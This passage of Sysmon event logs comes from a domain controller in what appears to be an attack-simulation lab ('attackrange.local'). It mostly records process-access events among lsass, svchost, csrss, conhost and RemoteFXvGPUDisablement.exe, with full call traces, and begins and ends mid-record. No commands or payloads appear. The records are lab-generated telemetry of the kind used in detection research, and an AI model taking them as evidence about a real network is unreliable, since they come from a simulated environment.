C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"1104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2144\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1084","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2144","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2144\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2144","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nSourceProcessId: 1216\r\nSourceThreadId: 2100\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","SourceProcessId":"1216","SourceThreadId":"2100","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":938,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B6C20200}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B6C20200}","TargetProcessId":"2156","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.893\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2164\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.893","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2164","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":940,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.956\r\nProcessGuid: {41C8662E-1F63-5F25-0000-001044B90000}\r\nProcessId: 1140\r\nImage: C:\\Windows\\system32\\svchost.exe\r\nTargetFilename: C:\\Windows\\System32\\wbem\\Repository\\WRITABLE.TST\r\nCreationUtcTime: 2020-08-01 07:53:07.956","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.956","ProcessGuid":"{41C8662E-1F63-5F25-0000-001044B90000}","Image":"C:\\Windows\\system32\\svchost.exe","TargetFilename":"C:\\Windows\\System32\\wbem\\Repository\\WRITABLE.TST","CreationUtcTime":"2020-08-01 07:53:07.956","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":941,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:07.987\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:07.987","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPC